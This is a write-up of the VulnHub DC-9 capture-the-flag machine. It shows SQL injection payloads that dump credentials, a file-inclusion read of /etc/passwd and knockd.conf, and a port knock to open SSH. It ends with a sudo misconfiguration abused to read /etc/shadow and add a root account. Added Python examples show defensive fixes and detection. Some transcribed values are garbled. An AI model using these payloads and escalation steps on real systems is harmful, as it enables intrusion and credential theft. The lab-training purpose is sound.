vulnhub

DC-9

10 May 2022 09:21 PM

Browser at 192.168.43.231/index.php: Example.com - Staff Details (menu: Home, Display All Records, Search, Manage). Welcome to the Example.com Staff Details Page. Please select an option from the menu.

Search information You can search using either the first or last name. Search:

Search results
Name: Mary Moe Position: CEO Phone No: 46478415155456 Email: marym@example.com
Name: Julie Dooley Position: Human Resources Phone No: 46457131654 Email: julied@example.com
Name: Fred Flintstone Position: Systems Administrator Phone No: 46415323 Email: fredf@example.com
Name: Barney Rubble

mary' order by 1 -- -

Search results
Name: Mary Moe Position: CEO Phone No: 46478415155456 Email: marym@example.com

mary' union all select 1,2,3,4,5,6 -- -
mary' union all select 1,2,3,4,@@version,6 -- -

Search results
Name: Mary Moe Position: CEO Phone No: 46478415155456 Email: marym@example.com
Name: 2 3 Position: 4 Phone No: 10.3.17-MariaDB-0+deb10u1

mary' union all select 1,2,3,4,schema_name,6 from information_schema.schemata -- -

Search results
Name: Mary Moe Position: CEO Phone No: 46478415155456 Email: marym@example.com
Name: 2 3 Position: 4 Phone No: information_schema Email: 6
Name: 2 3 Position: 4 Phone No: Staff Email: 6
Name: 2 3 Position: 4 Phone No: users Email: 6

mary' union select all 1,2,3,4,table_name,6 from information_schema.tables -- -

Phone No: INNODB_SYS_VIRTUAL
Name: 2 3 Position: 4 Phone No: INNODB_TABLESPACES_SCRUBBING Email: 6
Name: 2 3 Position: 4 Phone No: INNODB_SYS_SEMAPHORE_WAITS Email: 6
Name: 2 3 Position: 4 Phone No: StaffDetails Email: 6
Name: 2 3 Position: 4 Phone No: Users Email: 6
Name: 2 3 Position: 4 Phone No: UserDetails Email: 6

mary' union all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='UserDetails' -- -

Search results
Name: 2 3 Position: 4 Phone No: id Email: 6
ID: 1 Name: 2 3 Position: 4 Phone No: firstname Email: 6
Name: 2 3 Position: 4 Phone No: lastname Email: 6
Name: 2 3 Position: 4 Phone No: username Email: 6
Name: 2 3 Position: 4 Phone No: password Email: 6
Name: 2 3 Position: 4 Phone No: reg_date Email: 6

mary' union all select 1,2,3,concat(username),concat(password),6 FROM users.UserDetails -- -

Search results
Name: Mary Moe Position: CEO Phone No: 46478415155456 Email: marym@example.com
Name: 2 3 Position: marym Phone No: 3kfs86sfd Email: 6
Name: 2 3 Position: julied Phone No: 468stdfsd2 Email: 6
Name: 2 3 Position: fredf Phone No: 4std87std1 Email: 6
Name: 2 3 Position: barneyr Phone No: RocksOff Email: 6
ID: 1 Name: 2 3 Position: tomc Phone No: TC&TheBoyz Email: 6

mary' union all select 1,2,3,concat(username),concat(password),6 FROM Users -- -

Search results
Name: Mary Moe Position: CEO Phone No: 46478415155456 Email: marym@example.com
Name: 2 3 Position: admin Phone No: 856f5de590ef37314e7c3bdf6f8a66dc Email: 6

pass -->> 856f5de590ef37314e7c3bdf6f8a66dc
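Why the search terms above return rows from other tables, and what stops it, as an added example that is not code from the target application. The query shape, the SQLite stand-in for MariaDB, the column names of the stand-in tables and the stored value are assumptions.

```python
import sqlite3

def make_db():
    # Constructed stand-in data; SQLite replaces the MariaDB server from the write-up.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE StaffDetails (id INTEGER, firstname TEXT COLLATE NOCASE,
                                   lastname TEXT COLLATE NOCASE, position TEXT,
                                   phone TEXT, email TEXT);
        INSERT INTO StaffDetails VALUES
            (1, 'Mary', 'Moe', 'CEO', '46478415155456', 'marym@example.com');
        CREATE TABLE Users (UserID INTEGER, Username TEXT, Password TEXT);
        INSERT INTO Users VALUES (1, 'admin', 'constructed-hash-value');
    """)
    return db

def search_vulnerable(db, term):
    # Assumed shape of the flawed query: the term is pasted into the SQL text,
    # so a quote in the term closes the string literal and the rest runs as SQL.
    sql = ("SELECT * FROM StaffDetails WHERE firstname = '" + term +
           "' OR lastname = '" + term + "'")
    return db.execute(sql).fetchall()

def search_parameterized(db, term):
    # The term is bound as a value; quotes and keywords in it are never parsed as SQL.
    sql = "SELECT * FROM StaffDetails WHERE firstname = ? OR lastname = ?"
    return db.execute(sql, (term, term)).fetchall()

# Same shape as the search terms in the write-up, adapted to the stand-in schema.
PROBE = "mary' union all select 1,2,3,Username,Password,6 FROM Users -- -"

if __name__ == "__main__":
    db = make_db()
    print("concatenated :", search_vulnerable(db, PROBE))
    print("parameterized:", search_parameterized(db, PROBE))
```

With bound parameters the whole probe is compared against the name columns as one string, so it matches no staff record and the Users table is never read.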

Online hash lookup (accepts up to 20 non-salted hashes, one per line), with 856f5de590ef37314e7c3bdf6f8a66dc submitted.

Example.com - Staff Details, Manage page: "Login to manage records." Username: admin, Password:

After logging in, the menu gains Add Record and Log Out, and the page shows "Logged in as admin".

Example.com - Staff Details, logged in as admin ("You are already logged in as admin."). Under "File does not exist" the page prints the contents of /etc/passwd. The legible entries:
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
marym:x:1001:1001:Mary Moe:/home/marym:/bin/bash
wilmat:x:1007:1007:Wilma Rubble:/home/bettyr:/bin/bash
monicag:x:1013:1013:Monica Geller:/home/monicag:/bin/bash
Other entries (among them gnats, mysql, julied, chandlerb, rachelg and phoebeb) are only partly visible in the screenshot.

Same page, this time printing the knockd configuration under "File does not exist":
[options]
    UseSyslog

[openSSH]
    sequence = 7469,8475,9842
    seq_timeout = 25
    command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags = syn

[closeSSH]
    sequence =
    seq_timeout = 25
    command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags = syn

All the users I saw earlier have accounts on the machine, and the passwords we got might let me log in. From the nmap report, however, we know that the SSH port is filtered, which could mean that access is restricted by IP or that we are dealing with “port knocking”. Taking advantage of the LFI, I tried to read a knockd.conf file, if one was available, and successfully got its contents.

Great, now all we have to do is to knock the sequence of ports displayed from the file using nmap. Port knocking with nmap using those port numbers can be accomplished with the following command:

port knocking https://sushant747.gitbooks.io/total-oscp-guide/content/port_knocking.html
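How the sequence and seq_timeout from that file show up in firewall logs, as an added example that is not part of the original write-up: it flags every source that completes the openSSH sequence, so the knock can be correlated with later SSH logins. The matching rule is a simplified model of knockd, and the events and addresses are constructed.

```python
SEQUENCE = (7469, 8475, 9842)  # openSSH sequence from the knockd.conf above
SEQ_TIMEOUT = 25               # seq_timeout from the same file, in seconds

def find_knocks(events, sequence=SEQUENCE, timeout=SEQ_TIMEOUT):
    """events: (time_s, source_ip, dst_port) for inbound TCP SYNs, in time order.
    Returns [(source_ip, time_completed)] for every completed knock sequence."""
    progress = {}  # source_ip -> (ports matched so far, time of first knock)
    hits = []
    for ts, src, port in events:
        matched, start = progress.get(src, (0, ts))
        if matched and ts - start > timeout:
            matched = 0                  # attempt expired
        if port == sequence[matched]:
            if matched == 0:
                start = ts
            matched += 1
        elif port == sequence[0]:
            matched, start = 1, ts       # wrong port, but it restarts the sequence
        else:
            matched = 0                  # any other port breaks the attempt
        if matched == len(sequence):
            hits.append((src, ts))
            matched = 0
        progress[src] = (matched, start)
    return hits

# Constructed SYN events, as they might be parsed from firewall logs.
EVENTS = [
    (0.0, "10.0.0.5", 7469), (0.4, "10.0.0.5", 8475), (0.9, "10.0.0.5", 9842),
    (5.0, "10.0.0.9", 7469), (6.0, "10.0.0.9", 80),     # interrupted by port 80
    (7.0, "10.0.0.9", 8475), (8.0, "10.0.0.9", 9842),
    (10.0, "10.0.0.7", 7469), (20.0, "10.0.0.7", 8475),
    (40.0, "10.0.0.7", 9842),                           # slower than seq_timeout
]

if __name__ == "__main__":
    print(find_knocks(EVENTS))
```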

Terminal, as janitor on dc-9: ls -la in the home directory shows .bash_history (pointing to /dev/null), .gnupg and .secrets-for-putin. Inside .secrets-for-putin there is one file, passwords-found-on-post-it-notes.txt (66 bytes):
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
POLictn0-4
B4-Tru3-001
4uGU5T-NiGHts

fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:
User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test
fredf@dc-9:~$ sudo /opt/devstuff/dist/test/test
Usage: python test.py read append

sudo /opt/devstuff/dist/test/test /etc/shadow /tmp/pass
cat /tmp/pass
root : $6$1 Fbb8QQt c Fwj1PZraeiOCkMqsJ4/4pnd10aio. f2føLsmy2G91 EyxJrEZvZYjmXRf JK/ : 18259 : : 99999 : 7 : : :
bin games backu

(kali@kali)-[~/Desktop/ctf/vulnhub/dc9] openssl passwd pass
BdLRy0XAnuuCE

nano /tmp/usr
fredf@dc-9:~$ sudo /opt/devstuff/dist/test/test /tmp/usr /etc/passwd
fredf@dc-9:~$ su newroot
Password:
root@dc-9:/home/fredf# id
gid=0(root) groups=0(root)
root@dc-9:/home/fredf# whoami
root
cat /tmp/usr
newroot:8dLRy0XAnuuCE:0:0:new_root:/root:/bin/bash
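The line appended to /etc/passwd above has two properties an audit can key on: UID 0 on an account other than root, and a password hash stored in the passwd file itself. An added example of that check, not part of the original write-up; the sample file, the fredf UID and the hash placeholder are constructed.

```python
# Values in the password field that mean "no hash is stored in this file".
NO_HASH = {"x", "*", "!", "!!"}

def audit_passwd(text):
    """Return (line_number, issue, account) tuples for suspicious passwd entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, "malformed", fields[0]))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append((lineno, "extra-uid0", name))      # second superuser
        if pw == "":
            findings.append((lineno, "empty-password", name))  # login without password
        elif pw not in NO_HASH:
            findings.append((lineno, "hash-in-passwd", name))  # bypasses /etc/shadow
    return findings

# Constructed sample: two normal entries plus a line shaped like the appended one.
SAMPLE = """root:x:0:0:root:/root:/bin/bash
fredf:x:1003:1003:Fred Flintstone:/home/fredf:/bin/bash
newroot:CONSTRUCTEDHASH:0:0:new_root:/root:/bin/bash
"""

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE):
        print(finding)
```

The underlying fix is on the sudo side: a NOPASSWD rule for a tool that appends one arbitrary file to another gives root-level write access to every file on the system.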

cat theflag.txt NICE WORK!! Congratulations - you have done well to get to this point. Hope you enjoyed DC-9. Just wanted to send out a big thanks to all those who have taken the time to complete the various DC challenges. I also want to send out a big thank you to the various members of . They are an inspirational bunch of fellows. Sure, they might smell a bit, but ... just kidding. Sadly, all things must come to an end, and this will be the last ever challenge in the DC series. So long, and thanks for all the fish.